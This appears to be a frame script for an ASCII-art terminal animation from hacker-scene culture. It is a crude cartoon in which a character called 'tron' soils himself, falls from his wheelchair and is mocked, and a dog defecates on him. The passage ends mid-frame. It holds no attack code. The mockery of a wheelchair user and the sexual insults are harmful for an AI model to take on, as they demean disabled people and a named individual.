;$$$' ~~~~~~ $$$$$$i .i$
($$$. '!$$$i.
(#$$!. $i `V!
`#$$!. ,!$W!
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 220
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_BEGIN 221
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$ .eee
'$$$eee$$$$ee
|$$$$$$~~ ,
,!$$$ |$$$ i$
$$$# |$$$$$$$$$$$$$$$i .i$i
;$$$' ~~~~~~ 'iiii$$$$Ii
($$$. . '!V'
(#$$!. $i.
`#$$!. ,!$W!
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 221
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_BEGIN 222
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$ .eee
'$$$eee$$$$ee ,_
|$$$$$$~~ |ee.
,!$$$ |$$$ __ '$$
$$$# |$$$$$$$$$$$$$$$$$$$$|
;$$$' ~~~~~~ 'V!'
($$$. .
(#$$!. $i.
`#$$!. ,!$W!
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 222
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 221 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 220 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 221 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 222 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 221 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 220 0
HACKPLAYEROPT:SLEEP 2
HACKPLAYEROPT:FRAME_BEGIN 240
,i$$$i.
$$$$$$$ *eye 0wn all 0f j00*
#$$$$$#
`$$$'
$$$ .eee [3 hours later]
'$$$eee$$$$ee
|$$$$$$~~
,!$$$ |$$$
$$$# |$$$$$$$$$$i. ,i
;$$$' ~~~~~~ $$$$$$i .i$
($$$. *DIAHREA* '!$$$i.
(#$$!. $i `V!
`#$$!. ,!$W!
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 240
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_BEGIN 290
,i$$$i.
$$$$$$$ *eye 0wn all 0f j00*
#$$$$$#
`$$$'
$$$ .eee [3 hours later]
'$$$eee$$$$ee
|$$$$$$~~
,!$$$ |$$$
$$$# |$$$$$$$$$$i. ,i
;$$$' ~~~~~~ $$$$$$i .i$
($$$. *DIAHREA* '!$$$i.
(#$$!. $i `V!
`#$$!. ,!$W!
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 290
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 240 0
HACKPLAYEROPT:SLEEP 2
HACKPLAYEROPT:FRAME_BEGIN 241

,i$$$i.
$$$$$$$ *holy shit*
#$$$$$#
`$$$' ee
$$$ .eee
'$$$eee$$$ee
|$$$$$$~
,!$$$ |$$$
$$$# |$$$$$$$$$$i.
;$$$' ~~~~~~ $$$$i. ,i
($$$. *DIAHREA* `$$i.i$'
(#$$!. $i `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!:....:!iW$$#'
`##$$$$$$$$$##'
HACKPLAYEROPT:FRAME_END 241
HACKPLAYEROPT:SLEEP 1
HACKPLAYEROPT:FRAME_BEGIN 300

,i$$$i.
$$$$$$$ *holy shit*
#$$$$$#
`$$$'
$$$ .eee
'$$$eee$$$$ee
|$$$$$$~~
,!$$$ |$$$
$$$# |$$$$$$$$$$i.
;$$$' ~~~~~~ $$$$i. ,i
($$$. `$$i.i$'
(#$$!. $i `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!:....:!iW$$#'
`##$$$$$$$$$##'
HACKPLAYEROPT:FRAME_END 300
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_BEGIN 301

,i$$$i.
$$$$$$$ *holy shit*
#$$$$$#
`$$$' ee.
$$$ .e$e
'$$$ee$$e
|$$$$$'
,!$$$ |$$$ i$
$$$# |$$$$$$$$$$$$$$$i .i$i
;$$$' ~~~~~~ 'iiii$$$$Ii
($$$. . '!V'
(#$$!. $i.
`#$$!. ,!$W!
`#$$Wi!:....:!iW$$#'
`##$$$$$$$$$##'
HACKPLAYEROPT:FRAME_END 301
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 300 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 301 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 300 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 301 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 300 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 301 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 300 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 301 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 300 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 301 0
HACKPLAYEROPT:FRAME_BEGIN 242


,i$$$i.
$$$$$$$ *FUCK J00*
#$$$$$#
`$$$'
$$$ .eee
'$$$eee$$$$ee
|$$$$$$~~
,!$$$ |$$$
$$$# |$$$$$$$$$$i.
;$$$' ~~~~~~ $$$$i. ,i
($$$. `$$i.i$'
(#$$!. $i `!$$$!
`#$$!Wi:....,:!$!$W! `V'
`#$$Wi!#$##$,!iW$$#'
~~~~~~~~
HACKPLAYEROPT:FRAME_END 242
HACKPLAYEROPT:SLEEP 1
HACKPLAYEROPT:FRAME_BEGIN 310


,i$$$i.
$$$$$$$ *FUCK J00*
#$$$$$#
`$$$' ee.
$$$ .e$e
'$$$ee$$e
|$$$$$'
,!$$$ |$$$
$$$# |$$$$$$$$$$i.
;$$$' ~~~~~~ $$$$i. ,i
($$$. `$$i.i$'
(#$$!. $i `!$$$!
`#$$!Wi:....,:!$!$W! `V'
`#$$Wi!#$##$,!iW$$#'
~~~~~~~~
HACKPLAYEROPT:FRAME_END 310
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_BEGIN 311


,i$$$i.
$$$$$$$ *FUCK J00*
#$$$$$#
`$$$' ee.
$$$ .e$e .
'$$$ee$e _.e$$'
|$$$$'.ee$~'
,!$$$ |$$$ ~~
$$$# |$$$$$$$$$$$$$$$i .i$i
;$$$' ~~~~~~ 'iiii$$$$Ii
($$$. . '!V'
(#$$!. $i.
`#$$!Wi:....,:!$!$W!
`#$$Wi!#$##$,!iW$$#'
~~~~~~~~
HACKPLAYEROPT:FRAME_END 311
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_BEGIN 312


,i$$$i.
$$$$$$$ *FUCK J00*
#$$$$$#
`$$$' ee.
$$$ .e$e .
'$$$ee$$e ,!$.
|$$$$$' .iiii$$$$Ii
,!$$$ |$$$$$$$$$$$$$$$$i .i$i
$$$# |$$$$$$$$.
;$$$' ~~~~~~ $.'
($$$. $
(#$$!. $i.
`#$$!Wi:....,:!$!$W!
`#$$Wi!#$##$,!iW$$#'
~~~~~~~~
HACKPLAYEROPT:FRAME_END 312
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_BEGIN 313


,i$$$i.
$$$$$$$ *FUCK J00*
#$$$$$#
`$$$'
$$$ .eee .
'$$$eee$$$$ee ,!$.
|$$$$$$~~ .iiii$$$$Ii
,!$$$ |$$$$$$$$$$$$$$$$i .i$i
$$$# |$$$$$$$$.
;$$$' ~~~~~~ $.'
($$$. $
(#$$!. $i.
`#$$!Wi:....,:!$!$W!
`#$$Wi!#$##$,!iW$$#'
~~~~~~~~
HACKPLAYEROPT:FRAME_END 313
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 312 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 311 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 310 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 311 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 312 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 313 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 312 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 311 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 310 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 311 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 312 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 311 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 310 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 311 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 312 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 313 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 312 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 311 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 310 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 311 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 312 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 313 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_BEGIN 243



,i$$$i.
$$$$$$$_ *MOMMY, YOU WHORE! HELP, MY WHEEL CHAIR IS FALLING APART*
#$$$$
`$$$$~'
$$$ __.
'$$$eeeee$$eee~
|$$$$$$~~'
,!$$$ |$$$
$$$# |$$$$$$$$$$i.
;$$$' ~~~~~~ $$$$i. ,i
($$$. `$$i.i$'
(#$$!. $i `!$$$!
$`#$$!.#$.#.A$$$,!$W! `V'$.,.
HACKPLAYEROPT:FRAME_END 243
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_BEGIN 244



,i$$$i.
$$$$$$$ *MOMMY, YOU WHORE! HELP, MY WHEEL CHAIR IS FALLING APART*
#$$$$$#
`$$$$~
$$$ __.
'$$$eeeee$$eee~
|$$$$$$~~'
,!$$$ |$$$
$$$# |$$$$$$$$$$i.
;$$$' ~~~~~~ $$$$i. ,i
($$$. `$$i.i$'
(#$$!. $i `!$$$!
$`#$$!.#$.#.A$$$,!$W! `V'$.,.
HACKPLAYEROPT:FRAME_END 244
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 243 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 244 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 243 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 244 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 243 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 244 0
HACKPLAYEROPT:SLEEP 1
HACKPLAYEROPT:FRAME_BEGIN 250



,i$$$i.
$$$$$$$
#$$$$$#
`$$$$~
$$$ __.
'$$$eeeee$$eee~
|$$$$$$~~'
,!$$$ |$$$
$$$# |$$$$$$$$$$i.
;$$$' ~~~~~~ $$$$i. ,i
($$$. `$$i.i$'
(#$$!. $i `!$$$!
$`#$$!.#$.#.A$$$,!$W! `V'$.,.
HACKPLAYEROPT:FRAME_END 250
HACKPLAYEROPT:SLEEP 1
HACKPLAYEROPT:FRAME_BEGIN 251



,i$$$i.
$$$$$$$
#$$$$$#
`$$$$~
$$$ __.
'$$$eeeee$$eee~
|$$$$$$~~'
,!$$$ |$$$
$$$# |$$$$$$$$$$i.
;$$$' ~~~~~~ $$$$i. ,i
($$$. `$$i.i$'
(#$$!. $i `!$$$!
$`#$$!.#$.#.A$$$,!$W! `V'$.,.
HACKPLAYEROPT:FRAME_END 251
HACKPLAYEROPT:USLEEP 100000
HACKPLAYEROPT:FRAME_BEGIN 252



,i$$$i.
$$$$$$$
#$$$$$#
~$$$$'
$$$ __.
'$$$eeeee$$eee~
|$$$$$$~~'
,!$$$ |$$$
$$$# |$$$$$$$$$$i.
;$$$' ~~~~~~ $$$$i. ,i
($$$. `$$i.i$'
(#$$!. $i `!$$$!
$`#$$!.#$.#.A$$$,!$W! `V'$.,.
HACKPLAYEROPT:FRAME_END 252
HACKPLAYEROPT:USLEEP 300000
HACKPLAYEROPT:FRAME_INDENT 251
HACKPLAYEROPT:USLEEP 100000
HACKPLAYEROPT:FRAME_INDENT 250
HACKPLAYEROPT:USLEEP 300000
HACKPLAYEROPT:FRAME_INDENT 251
HACKPLAYEROPT:USLEEP 100000
HACKPLAYEROPT:FRAME_INDENT 252
HACKPLAYEROPT:USLEEP 500000
HACKPLAYEROPT:FRAME_INDENT 251
HACKPLAYEROPT:USLEEP 150000
HACKPLAYEROPT:FRAME_INDENT 250
HACKPLAYEROPT:SLEEP 1
HACKPLAYEROPT:FRAME_BEGIN 320



,i$$$i.
$$$$$$$ *MOM, HELP, MY WHEEL CHAIR IS FALLING APART*
#$$$$$#
`$$$'
$$$
|$$$$$$e.
|$$$ '$$$$'
|$$$$$$$$$$$i.
$$$#|$$$$$$$$$$$$$$i.
;$$$' ~~~~~~~~~ $$$$i. ,i
($$$. `$$i.i$'
(#$$!. $i `!$$$!
$`#$$!.#$.#.A$$$,!$W! `V'$.,.
HACKPLAYEROPT:FRAME_END 320
HACKPLAYEROPT:SLEEP 2
HACKPLAYEROPT:FRAME_BEGIN 329



,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$

  

|$$$$$.
|$$$e$$'
|$$$$$#$$$$$i.
$$$#|$$$$#$$$$$$$$$i.
;$$$' ~~~~|||~~~ $$$$i. ,i
($$$. `$$i.i$'
(#$$!. $i `!$$$!
$`#$$!.#$.#.A$$$,!$W! `V'$.,.
HACKPLAYEROPT:FRAME_END 329
HACKPLAYEROPT:USLEEP 400000
HACKPLAYEROPT:FRAME_BEGIN 321



,i$$$i.
$$$$$$$ *LOSING..
#$$$$$#
`$$$'
$$$
|$$$e.
|$$$$$
|$$$$$|
$$$#$$$$$$$$$$$$$$$i.
;$$$'~~$$$~~~~~ $$$$i. ,i
($$$. ||| `$$i.i$'
(#$$!. $i `!$$$!
$`#$$!.#$.#.A$$$,!$W! `V'$.,.
HACKPLAYEROPT:FRAME_END 321
HACKPLAYEROPT:SLEEP 1
HACKPLAYEROPT:FRAME_BEGIN 322



,i$$$i.
$$$$$$$ *LOSING.. STRENGTH..*
#$$$$$#
`$$$'
$$$
|$$$e.
|$$$$$
|$$$$$|
$$$#$$$$$$$$$$$$$$$i.
;$$$'$$$~~~~~~~ $$$$i. ,i
($$$.||| `$$i.i$'
(#$$!. $i `!$$$!
$`#$$!.#$.#.A$$$,!$W! `V'$.,.
HACKPLAYEROPT:FRAME_END 322
HACKPLAYEROPT:SLEEP 2
HACKPLAYEROPT:FRAME_BEGIN 323

*CELLPHONE! HERE BOY!!*
V-'
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e.
|$$$$$
|$$$$$|
$$$#$$$$$$$$$$$$$$$i.
;$$$'$$$~~~~~~~ $$$$i. ,i
($$$.||| `$$i.i$'
(#$$!. $i `!$$$!
$`#$$!.#$.#.A$$$,!$W! `V'$.,.
HACKPLAYEROPT:FRAME_END 323
HACKPLAYEROPT:SLEEP 1
HACKPLAYEROPT:CLEAR
HACKPLAYEROPT:FRAME_BEGIN 324

*CELLPHONE! HERE BOY!!* *HEY!!*
V-'
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e. *ARF ARF*
|$$$$$
|$$$$$| /)
$$$#$$$$$$$$$$$$$$$i. o__^^/_/)
;$$$'$$$~~~~~~~ $$$$i. ,i \ ' \`-' ,
($$$.||| `$$i.i$' `| \______/,
(#$$!. $i `!$$$! | \
$`#$$!.#$.#.A$$$,!$W! `V'$.,. \.\.------,.\
HACKPLAYEROPT:FRAME_END 324
HACKPLAYEROPT:USLEEP 100000
HACKPLAYEROPT:FRAME_BEGIN 325

*CELLPHONE! HERE BOY!!* *HEY!!*
V-'
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e. *ARF ARF*
|$$$$$
|$$$$$| /)
$$$#$$$$$$$$$$$$$$$i. o__^^/_/)
;$$$'$$$~~~~~~~ $$$$i. ,i \ ' \`-' ___
($$$.||| `$$i.i$' `| \______/--'`
(#$$!. $i `!$$$! | \
$`#$$!.#$.#.A$$$,!$W! `V'$.,. ././-------,.\
HACKPLAYEROPT:FRAME_END 325
HACKPLAYEROPT:USLEEP 100000
HACKPLAYEROPT:FRAME_BEGIN 326

*CELLPHONE! HERE BOY!!* *HEY!!*
V-'
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e. *ARF ARF*
|$$$$$
|$$$$$| /)
$$$#$$$$$$$$$$$$$$$i. o__^^/_/)
;$$$'$$$~~~~~~~ $$$$i. ,i \ ' \`-' ,
($$$.||| `$$i.i$' `| \______/,
(#$$!. $i `!$$$! | \
$`#$$!.#$.#.A$$$,!$W! `V'$.,. \.\.------,.\
HACKPLAYEROPT:FRAME_END 326
HACKPLAYEROPT:USLEEP 100000
HACKPLAYEROPT:FRAME_BEGIN 327

*CELLPHONE! HERE BOY!!* *HEY!!*
V-'
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e. *ARF ARF*
|$$$$$
|$$$$$| /)
$$$#$$$$$$$$$$$$$$$i. o__^^/_/)
;$$$'$$$~~~~~~~ $$$$i. ,i \ ' \`-' ___
($$$.||| `$$i.i$' `| \______/--'`
(#$$!. $i `!$$$! | \
$`#$$!.#$.#.A$$$,!$W! `V'$.,. ././-------,.\
HACKPLAYEROPT:FRAME_END 327
HACKPLAYEROPT:USLEEP 100000
HACKPLAYEROPT:FRAME_BEGIN 328

*CELLPHONE! HERE BOY!!* *HEY!!*
V-'
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e. *ARF ARF*
|$$$$$
|$$$$$| /)
$$$#$$$$$$$$$$$$$$$i. o__^^/_/)
;$$$'$$$~~~~~~~ $$$$i. ,i \ ' \`-' ,
($$$.||| `$$i.i$' `| \______/,
(#$$!. $i `!$$$! | \
$`#$$!.#$.#.A$$$,!$W! `V'$.,. \.\.------,.\
HACKPLAYEROPT:FRAME_END 328
HACKPLAYEROPT:USLEEP 100000
HACKPLAYEROPT:FRAME_BEGIN 329

*RUN CELLPHONE RUN!!*
V-'
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e. *ARF ARF*
|$$$$$
|$$$$$| /)
$$$#$$$$$$$$$$$$$$$i. o__^^/_/)
;$$$'$$$~~~~~~~ $$$$i. ,i \ ' \`-' ___
($$$.||| `$$i.i$' `| \______/--'`
(#$$!. $i `!$$$! | \
$`#$$!.#$.#.A$$$,!$W! `V'$.,. ././-------,.\
HACKPLAYEROPT:FRAME_END 329
HACKPLAYEROPT:USLEEP 100000
HACKPLAYEROPT:FRAME_BEGIN 330

*CELLPHONE..!:)*
V-'
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e. *ARF ARF*
|$$$$$
|$$$$$| /)
$$$#$$$$$$$$$$$$$$$i. o__^^/_/)
;$$$'$$$~~~~~~~ $$$$i. ,i \ ' \`-' ,
($$$.||| `$$i.i$' `| \______/,
(#$$!. $i `!$$$! | \
$`#$$!.#$.#.A$$$,!$W! `V'$.,. \.\.------,.\
HACKPLAYEROPT:FRAME_END 330
HACKPLAYEROPT:USLEEP 100000
HACKPLAYEROPT:FRAME_BEGIN 331



,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e. *ARF ARF*
|$$$$$
|$$$$$| /)
$$$#$$$$$$$$$$$$$$$i. o__^^/_/)
;$$$'$$$~~~~~~~ $$$$i. ,i \ ' \`-' ___
($$$.||| `$$i.i$' `| \______/--'`
(#$$!. $i `!$$$! | \
$`#$$!.#$.#.A$$$,!$W! `V'$.,. ././-------,.\
HACKPLAYEROPT:FRAME_END 331
HACKPLAYEROPT:USLEEP 100000
HACKPLAYEROPT:FRAME_BEGIN 332

*GOOD DOGGIE, IF ONLY I COULD CLONE YOU :D hehe*
v-^
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e. *ARF ARF*
|$$$$$
|$$$$$| /)
$$$#$$$$$$$$$$$$$$$i. o__^^/_/)
;$$$'$$$~~~~~~~ $$$$i. ,i /' \`-' ___
($$$.||| `$$i.i$' `| \______/--'`
(#$$!. $i `!$$$! | \
$`#$$!.#$.#.A$$$,!$W! `V'$.,. ././-------,.\
HACKPLAYEROPT:FRAME_END 332
HACKPLAYEROPT:SLEEP 3
HACKPLAYEROPT:FRAME_BEGIN 333



,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e. *TRON. ARF*
|$$$$$
|$$$$$| /)
$$$#$$$$$$$$$$$$$$$i. o__^^/_/)
;$$$'$$$~~~~~~~ $$$$i. ,i /' \`-' ,
($$$.||| `$$i.i$' `| \______/,
(#$$!. $i `!$$$! | \
$`#$$!.#$.#.A$$$,!$W! `V'$.,. ././-------,.\
HACKPLAYEROPT:FRAME_END 333
HACKPLAYEROPT:SLEEP 3
HACKPLAYEROPT:FRAME_BEGIN 334



,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e. *TRON. ARF*
|$$$$$
|$$$$$| /)
$$$#$$$$$$$$$$$$$$$i. o__^^/_/)
;$$$'$$$~~~~~~~ $$$$i. ,i /' \`-' ,
($$$.||| `$$i.i$' `| \______/,
(#$$!. $i `!$$$! | \
$`#$$!.#$.#.A$$$,!$W! `V'$.,. ././-------,./
HACKPLAYEROPT:FRAME_END 334
HACKPLAYEROPT:USLEEP 500000
HACKPLAYEROPT:FRAME_BEGIN 341



,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e. *TRON. ARF*
|$$$$$
|$$$$$| /)
$$$#$$$$$$$$$$$$$$$i. o__^^/_/)
;$$$'$$$~~~~~~~ $$$$i. ,i /' \`-' ,
($$$.||| `$$i.i$' `| \______/,
(#$$!. $i `!$$$! | \
$`#$$!.#$.#.A$$$,!$W! `V'$.,. ././-------,./
HACKPLAYEROPT:FRAME_END 341
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_BEGIN 342



,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e. *TRON. ARF*
|$$$$$
|$$$$$| /)
$$$#$$$$$$$$$$$$$$$i. o__^^/_/)
;$$$'$$$~~~~~~~ $$$$i. ,i /' \`-' ,
($$$.||| `$$i.i$' `| \______/,
(#$$!. $i `!$$$! | \
$`#$$!.#$.#.A$$$,!$W! `V'$.,. ././-------,./
HACKPLAYEROPT:FRAME_END 342
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_BEGIN 343



,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e. *TRON. ARF*
|$$$$$
|$$$$$| /)
$$$#$$$$$$$$$$$$$$$i. o__^^/_/)
;$$$'$$$~~~~~~~ $$$$i. ,i /' \`-' ,
($$$.||| `$$i.i$' `| \______/,
(#$$!. $i `!$$$! | \
$`#$$!.#$.#.A$$$,!$W! `V'$.,. ././-------,./
HACKPLAYEROPT:FRAME_END 343
HACKPLAYEROPT:USLEEP 500000
HACKPLAYEROPT:FRAME_BEGIN 344

*What??*
v-^
,i$$$i.
.$$$$$$$
!#$$$$$
`$$$#'
$$$
|$$$e. *ARF ARF*
|$$$$$
|$$$$$| /)
$$$#$$$$$$$$$$$$$$$i. o__^^/_/)
;$$$'$$$~~~~~~~ $$$$i. ,i /' \`-' ,
($$$.||| `$$i.i$' `| \______/,
(#$$!. $i `!$$$! | \
$`#$$!.#$.#.A$$$,!$W! `V'$.,. ././-------,./
HACKPLAYEROPT:FRAME_END 344
HACKPLAYEROPT:SLEEP 3
HACKPLAYEROPT:FRAME_INDENT 343 0
HACKPLAYEROPT:USLEEP 150000
HACKPLAYEROPT:FRAME_INDENT 342 0
HACKPLAYEROPT:USLEEP 150000
HACKPLAYEROPT:FRAME_INDENT 341 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 334 0
HACKPLAYEROPT:USLEEP 500000
HACKPLAYEROPT:FRAME_BEGIN 335



,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e. *tron TIPPED OVER in his wheelchair, PRICELESS*
|$$$$$
|$$$$$| /)
$$$#$$$$$$$$$$$$$$$i. o__^^/_/)
;$$$'$$$~~~~~~~ $$$$i. ,i /' \`-'
($$$.||| `$$i.i$' `| \______/,
(#$$!. $i `!$$$! | \
$`#$$!.#$.#.A$$$,!$W! `V'$.,. ././-------,.\
HACKPLAYEROPT:FRAME_END 335
HACKPLAYEROPT:SLEEP 3
HACKPLAYEROPT:FRAME_BEGIN 336

*fuck j00, what the fuck*
v-^
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e. *bwhaahahahahahahahahahahahahahhahaha*
|$$$$$
|$$$$$| /)
$$$#$$$$$$$$$$$$$$$i. o__^^/_/)
;$$$'$$$~~~~~~~ $$$$i. ,i /' \`-'
($$$.||| `$$i.i$' `| \______/,
(#$$!. $i `!$$$! | \
$`#$$!.#$.#.A$$$,!$W! `V'$.,. ././-------,.\
HACKPLAYEROPT:FRAME_END 336
HACKPLAYEROPT:SLEEP 3
HACKPLAYEROPT:FRAME_BEGIN 337



,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$ *FOR ME TO POOP ON!*
|$$$e.
|$$$$$
|$$$$$| /)
$$$#$$$$$$$$$$$$$$$i. o__^^/_/)
;$$$'$$$~~~~~~~ $$$$i. ,i /' \`-' ,
($$$.||| `$$i.i$' `| \______/,
(#$$!. $i `!$$$! | \
$`#$$!.#$.#.A$$$,!$W! `V'$.,. ././-------,.\
HACKPLAYEROPT:FRAME_END 337
HACKPLAYEROPT:SLEEP 3
HACKPLAYEROPT:FRAME_BEGIN 338

*NOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO!!!!!!!!!!!!!!!!!!!!!!!!!*
v-^
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$ *FOR ME TO POOP ON!*
|$$$e.
|$$$$$
|$$$$$| /)
$$$#$$$$$$$$$$$$$$$i. o__^^/_/)
;$$$'$$$~~~~~~~ $$$$i. ,i /' \`-' ,
($$$.||| `$$i.i$' `| \______/, *FART*
(#$$!. $i `!$$$! | \
$`#$$!.#$.#.A$$$,!$W! `V'$.,. ././-------,.\
HACKPLAYEROPT:FRAME_END 338
HACKPLAYEROPT:SLEEP 3
HACKPLAYEROPT:CLEAR
HACKPLAYEROPT:FRAME_BEGIN 339



####### ####### ######
# # # # #
# # # # #
##### # # ######
# # # # #
# # # # #
# ####### # #



HACKPLAYEROPT:FRAME_END 339
HACKPLAYEROPT:SLEEP 1
HACKPLAYEROPT:CLEAR
HACKPLAYEROPT:FRAME_BEGIN 340



# # #######
## ## #
# # # # #
# # # #####
# # #
# # #
# # #######



HACKPLAYEROPT:FRAME_END 340
HACKPLAYEROPT:SLEEP 1
HACKPLAYEROPT:CLEAR
HACKPLAYEROPT:FRAME_BEGIN 341



####### ###
# # #
# # #
# # #
# # #
# # #
# ###



HACKPLAYEROPT:FRAME_END 341
HACKPLAYEROPT:SLEEP 1
HACKPLAYEROPT:CLEAR
HACKPLAYEROPT:FRAME_BEGIN 342



###### ####### ####### ###### ####### # # ###
# # # # # # # # # # ## # ###
# # # # # # # # # # # # # ###
###### # # # # ###### # # # # # #
# # # # # # # # # # #
# # # # # # # # # ## ###
# ####### ####### # ####### # # ###



HACKPLAYEROPT:FRAME_END 342
HACKPLAYEROPT:SLEEP 2
HACKPLAYEROPT:CLEAR
HACKPLAYEROPT:FRAME_BEGIN 343

*NOOOOO!*
v-^
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e.
|$$$$$ _
|$$$$$| (\ \)
$$$#$$$$$$$$$$$$$$$i. o__^\/ ,
;$$$'$$$~~~~~~~ $$$$i. ,i \ ' \ <
($$$.||| `$$i.i$' `| \____\
(#$$!. $i `!$$$! | ) *FART*
$`#$$!.#$.#.A$$$,!$W! `V'$.,. .//---_/-_/
HACKPLAYEROPT:FRAME_END 343
HACKPLAYEROPT:USLEEP 500000
HACKPLAYEROPT:FRAME_BEGIN 344

*NOOOOOOO!!*
v-^
,i$$$i.
$$$$$$$
